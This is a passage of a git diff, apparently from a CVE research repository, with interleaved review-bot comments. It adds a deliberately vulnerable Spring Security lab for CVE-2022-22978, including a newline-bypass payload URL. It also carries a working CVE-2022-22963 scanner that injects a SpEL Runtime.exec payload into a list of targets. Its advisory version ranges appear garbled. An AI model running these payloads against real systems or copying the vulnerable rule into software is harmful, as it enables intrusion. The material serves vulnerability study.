in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + if [ -n "$MVNW_REPOURL" ]; then + jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + else + jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + fi + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + if $cygwin; then + wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` + fi + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + else + wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + fi + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... 
using curl" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + curl -o "$wrapperJarPath" "$jarUrl" -f + else + curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f + fi + + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + # For Cygwin, switch paths to Windows format before running javac + if $cygwin; then + javaClass=`cygpath --path --windows "$javaClass"` + fi + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." + fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." + fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +# Provide a "standardized" way to retrieve the CLI args 
that will +# work with both Windows and non-Windows executions. +MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@" +export MAVEN_CMD_LINE_ARGS + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + $MAVEN_DEBUG_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" \ + "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd new file mode 100644 index 0000000000000000000000000000000000000000..1d8ab018eaf11d9b3a4a90e7818ace373dfbb380 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd 
@@ -0,0 +1,188 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM https://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. 
to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %* +if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %* +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. 
+ +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + +FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + if "%MVNW_VERBOSE%" == "true" ( + echo Found %WRAPPER_JAR% + ) +) else ( + if not "%MVNW_REPOURL%" == "" ( + SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + ) + if "%MVNW_VERBOSE%" == "true" ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... 
+ echo Downloading from: %DOWNLOAD_URL% + ) + + powershell -Command "&{"^ + "$webclient = new-object System.Net.WebClient;"^ + "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^ + "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^ + "}"^ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^ + "}" + if "%MVNW_VERBOSE%" == "true" ( + echo Finished downloading %WRAPPER_JAR% + ) +) +@REM End of extension + +@REM Provide a "standardized" way to retrieve the CLI args that will +@REM work with both Windows and non-Windows executions. +set MAVEN_CMD_LINE_ARGS=%* + +%MAVEN_JAVA_EXE% ^ + %JVM_CONFIG_MAVEN_PROPS% ^ + %MAVEN_OPTS% ^ + %MAVEN_DEBUG_OPTS% ^ + -classpath %WRAPPER_JAR% ^ + "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^ + %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat" +if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%"=="on" pause + +if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE% + +cmd /C exit /B %ERROR_CODE% diff --git a/cve/java-spring-security/2022/CVE-2022-22978/pom.xml b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml new file mode 100644 index 0000000000000000000000000000000000000000..861fa8cf22bbfcf4a161073a9f21ad953cb87622 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml 
@@ -0,0 +1,68 @@ + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.7.0 + + + cc.saferoad + CVE-2022-22978 + 0.0.1-SNAPSHOT + jar + CVE-2022-22978 + CVE-2022-22978 + + 1.8 + 5.6.3 + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework.boot + spring-boot-starter-tomcat + provided + + + org.springframework.boot + spring-boot-starter-test + test + + + org.springframework.boot + spring-boot-starter-security + + + org.springframework.boot + spring-boot-starter-thymeleaf + + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989 + + + + + org.apache.maven.plugins + maven-surefire-plugin + + true + + + + + +
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
new file mode 100644
index 0000000000000000000000000000000000000000..2415af494fc3f501484c9a5e08e03374dd1f480d
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/config/SpringSecurityConfig.java
@@ -0,0 +1,16 @@
+package cc.saferoad.config;
+
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
+
+@Configuration
+@EnableWebSecurity
+public class SpringSecurityConfig extends WebSecurityConfigurerAdapter {
+
+ @Override
+ protected void configure(HttpSecurity httpSecurity) throws Exception{
+ httpSecurity.authorizeRequests().regexMatchers("/admin/.*").authenticated();
+ }
+}
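Review bot: The spring-boot-maven-plugin jvmArguments `-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8989` start the application with a JDWP listener that, on older JDKs, binds to every interface when no host is given, and `suspend=y` blocks startup until a debugger attaches; for a lab that is only ever debugged locally, `address=127.0.0.1:8989` and `suspend=n` are the safer defaults, or the flags belong in a separate Maven profile so a plain `mvn spring-boot:run` does not enable them. The XML tags were stripped in rendering, so the property that holds `5.6.3` cannot be read here, but a comment next to it stating that the pin to Spring Security 5.6.3 is deliberate for reproducing CVE-2022-22978 (the 2.7.0 parent would otherwise manage a newer release) would stop a future dependency bump from silently "fixing" the lab. The `true` under maven-surefire-plugin presumably skips tests, which hides that RegexRequestMatcherTests asserts the patched behaviour against the pinned vulnerable version; a comment there saying so would help.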
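Review bot: `regexMatchers("/admin/.*").authenticated()` is the intentionally vulnerable rule this lab exists for, but nothing in the file says so; a comment above the line such as `// Deliberately vulnerable on 5.6.3: '.' does not match line terminators, so a path with an encoded newline escapes this rule (CVE-2022-22978)` would keep the next reader from "fixing" it or copying it. The same comment should point at the mitigation for real code: use `mvcMatchers`/`antMatchers` for path-based rules, or upgrade to a patched Spring Security release. The rule also covers only `/admin/.*`; every other path is left with no authorization rule at all, which is fine for the demo but worth stating in the same comment. `throws Exception{` is missing the space before the brace.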
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
new file mode 100644
index 0000000000000000000000000000000000000000..f32b5613d98e1cdd9eb85facfdc6c506f016fe22
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/controller/Demo.java
@@ -0,0 +1,21 @@
+package cc.saferoad.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+/*@RestController*/
+@Controller
+public class Demo {
+ @GetMapping("/admin/*")
+ public String Manage(){
+ /*return "Manage page";*/
+ return "manage";
+ }
+
+ @GetMapping("/")
+ public String User(){
+ /* return "Hello bro";*/
+ return "index";
+ }
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
new file mode 100644
index 0000000000000000000000000000000000000000..cc5f37e2c647846f39b430bad8094dea52ccf2fb
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/Cve202222978Application.java
@@ -0,0 +1,13 @@
+package cc.saferoad.cve202222978;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication(scanBasePackages = {"cc.saferoad"})
+public class Cve202222978Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202222978Application.class, args);
+ }
+
+}
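Review bot: The handler methods `Manage()` and `User()` use PascalCase, which Java convention reserves for types; `manage()` and `user()` would match the rest of the code base and the view names they return. The `RestController` import is unused since the annotation is commented out, and the `/*return "Manage page";*/` and `/* return "Hello bro";*/` remnants should be deleted rather than kept as commented-out code. `@GetMapping("/admin/*")` is the endpoint the security rule in SpringSecurityConfig is meant to cover; a one-line comment linking the two, e.g. `// protected by the regexMatchers("/admin/.*") rule in SpringSecurityConfig`, would make the demo self-explanatory.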
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
new file mode 100644
index 0000000000000000000000000000000000000000..08cf300168f25b5a660a3ef21f1e735bff3e57bd
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/java/cc/saferoad/cve202222978/ServletInitializer.java
@@ -0,0 +1,15 @@
+package cc.saferoad.cve202222978;
+
+import org.springframework.boot.builder.SpringApplicationBuilder;
+import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
+import org.springframework.context.annotation.ComponentScan;
+
+@ComponentScan(basePackages = {"cc.saferoad"})
+public class ServletInitializer extends SpringBootServletInitializer {
+
+ @Override
+ protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
+ return application.sources(Cve202222978Application.class);
+ }
+
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
new file mode 100644
index 0000000000000000000000000000000000000000..8b137891791fe96927ad78e64b0aad7bded08bdc
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/application.properties
@@ -0,0 +1 @@
+
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
new file mode 100644
index 0000000000000000000000000000000000000000..682abdc580cc2c2c695daacc5c1d0b42ef181a2a
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/index.html
@@ -0,0 +1,14 @@ + + + + CVE-2022-22978 + + +
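Review bot: `@ComponentScan(basePackages = {"cc.saferoad"})` on ServletInitializer looks redundant: Cve202222978Application already declares `scanBasePackages = {"cc.saferoad"}`, and this class is not itself registered as a configuration source (`configure` only passes `Cve202222978Application.class`), so the annotation presumably has no effect unless the class happens to be picked up by scanning. Either drop it together with the `ComponentScan` import, or add a comment saying why the scan is declared in two places. ServletInitializer only matters for WAR deployment while the pom appears to package a `jar`; if the class is kept, a comment noting it is unused in the jar build would avoid confusion.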

+ CVE-2022-22978 Demo via Spring security 5.6.3
+ Manage page: /admin/index
+Payload: http://localhost:8080/admin/index%0a +

+ + \ No newline at end of file diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html new file mode 100644 index 0000000000000000000000000000000000000000..eeb40f2a2586c458bb300f8c860a4765bba9303d --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/src/main/resources/templates/manage.html @@ -0,0 +1,10 @@ + + + + + Manage + + +

This is manage page

+ + \ No newline at end of file
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
new file mode 100644
index 0000000000000000000000000000000000000000..f24ec38900aa094f734e254cf7ad0c444330ddfb
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/Cve202222978ApplicationTests.java
@@ -0,0 +1,13 @@
+package cc.saferoad.cve202222978;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202222978ApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
new file mode 100644
index 0000000000000000000000000000000000000000..864b85738029d0a6e209192980c61b55a0eaf06f
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/src/test/java/cc/saferoad/cve202222978/RegexRequestMatcherTests.java
@@ -0,0 +1,17 @@
+package cc.saferoad.cve202222978;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.mock.web.MockHttpServletRequest;
+import org.springframework.security.web.util.matcher.RegexRequestMatcher;
+import static org.assertj.core.api.Assertions.assertThat;
+
+public class RegexRequestMatcherTests {
+
+ @Test
+ public void matchesWithLineFeed() {
+ RegexRequestMatcher matcher = new RegexRequestMatcher(".*", null);
+ MockHttpServletRequest request = new MockHttpServletRequest("GET", "/blah%0d");
+ request.setServletPath("/blah\r");
+ assertThat(matcher.matches(request)).isTrue();
+ }
+}
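Review bot: `matchesWithLineFeed` sets the servlet path to `/blah\r`, a carriage return, so the name does not describe the input; `matchesWithCarriageReturn`, or a second case that uses `\n`, would be accurate. More importantly, `assertThat(matcher.matches(request)).isTrue()` encodes the patched behaviour: with the project pinned to Spring Security 5.6.3 this test is expected to fail, which is presumably why the surefire configuration in the pom skips tests. A class-level comment making that explicit, e.g. `// Mirrors the upstream regression test for CVE-2022-22978: fails on 5.6.3, passes on the patched 5.5.7/5.6.4 line`, turns a confusing red test into the lab's intended evidence. The `null` passed as the httpMethod argument also deserves a short comment that it means "any method".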
diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d24bc4c46e961197ebf259961d2524b3ff31130b
--- /dev/null
+++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml
@@ -0,0 +1,22 @@
+id: CVE-2022-22978
+source:
+ https://github.com/DeEpinGh0st/CVE-2022-22978
+info:
+ name: Authorization Bypass in RegexRequestMatcher of Spring Security
+ severity: critical
+ description: |
+ 在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证
+ scope-of-influence:
+ Spring Security 5.5.x prior to 5.5.75.5.6
+ Spring Security 5.6.x prior to 5.6.45.6.3
+ Spring Security Earlier unsupported versions
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22978
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22978
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, spring-security
\ No newline at end of file
diff --git a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
index fde2123952880b54faf2c853c0634e5d8f876614..2932dc34d94915a38d57cce8a1f70c65d430989e 100644
--- a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
+++ b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py
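Review bot: The `scope-of-influence` entries `Spring Security 5.5.x prior to 5.5.75.5.6` and `Spring Security 5.6.x prior to 5.6.45.6.3` look like two version strings run together; given that the pom in this commit pins 5.6.3 as the vulnerable version, the intended text is presumably `5.5.x prior to 5.5.7` and `5.6.x prior to 5.6.4`, which should be checked against the NVD entry already listed under `reference`. `cwe-id: None` is a placeholder; the sibling CVE-2022-22963.yaml in this commit fills its cwe-id, so this one should be completed from the advisory rather than left as None. `source:` also puts its URL on a continuation line, while the sibling file writes `source: https://...` inline; keeping the two records in the same shape makes them easier to parse.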
@@ -1,59 +1,59 @@ -import requests -import sys -import threading -import urllib3 -urllib3.disable_warnings() - - -def scan(txt,cmd): - - payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' - - data ='test' - headers = { - 'spring.cloud.function.routing-expression':payload, - 'Accept-Encoding': 'gzip, deflate', - 'Accept': '*/*', - 'Accept-Language': 'en', - 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', - 'Content-Type': 'application/x-www-form-urlencoded' - } - path = '/functionRouter' - f = open(txt) - urllist=f.readlines() - - for url in urllist : - url = url.strip('\n') - all = url + path - try: - req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) - code =req.status_code - text = req.text - rsp = '"error":"Internal Server Error"' - - if code == 500 and rsp in text: - print ( f'[+] { url } is vulnerable' ) - poc_file = open('vulnerable.txt', 'a+') - poc_file.write(url + '\n') - poc_file.close() - else: - print ( f'[-] { url } not vulnerable' ) - - except requests.exceptions.RequestException: - print ( f'[-] { url } detection timed out' ) - continue - except: - print ( f'[-] { url } error' ) - continue - - - -if __name__ == '__main__' : - try: - cmd1 =sys.argv[1] - t = threading . 
Thread ( target = scan ( cmd1 , 'whoami' ) ) - t.start() - except: - print ( 'Usage:' ) - print('python poc.py url.txt') +import requests +import sys +import threading +import urllib3 +urllib3.disable_warnings() + + +def scan(txt,cmd): + + payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' + + data ='test' + headers = { + 'spring.cloud.function.routing-expression':payload, + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', + 'Content-Type': 'application/x-www-form-urlencoded' + } + path = '/functionRouter' + f = open(txt) + urllist=f.readlines() + + for url in urllist : + url = url.strip('\n') + all = url + path + try: + req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) + code =req.status_code + text = req.text + rsp = '"error":"Internal Server Error"' + + if code == 500 and rsp in text: + print ( f'[+] { url } is vulnerable' ) + poc_file = open('vulnerable.txt', 'a+') + poc_file.write(url + '\n') + poc_file.close() + else: + print ( f'[-] { url } not vulnerable' ) + + except requests.exceptions.RequestException: + print ( f'[-] { url } detection timed out' ) + continue + except: + print ( f'[-] { url } error' ) + continue + + + +if __name__ == '__main__' : + try: + cmd1 =sys.argv[1] + t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) + t.start() + except: + print ( 'Usage:' ) + print('python poc.py url.txt') pass \ No newline at end of file diff --git a/cve/java-spring/2022/CVE-2022-22963/README.md b/cve/java-spring/2022/CVE-2022-22963/README.md index 0ab233688b5777d6687ea3f39617d706576aa8f4..0440d772ffc77c7e2c9def2b048f59850b5bfaee 100644 --- a/cve/java-spring/2022/CVE-2022-22963/README.md +++ b/cve/java-spring/2022/CVE-2022-22963/README.md 
@@ -1,10 +1,10 @@ -# CVE-2022-22963 -CVE-2022-22963 PoC - -Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable. - -# REF -https://github.com/dinosn/CVE-2022-22963 -https://avd.aliyun.com/search?q=CVE-2022-22963 -https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, +# CVE-2022-22963 +CVE-2022-22963 PoC + +Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable. + +# REF +https://github.com/dinosn/CVE-2022-22963 +https://avd.aliyun.com/search?q=CVE-2022-22963 +https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 \ No newline at end of file diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2d42eaa6e71f2eb46046c8a05838806e7..bd94e2e1bef27ba2ce33834841e6320b71f8f078 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml 
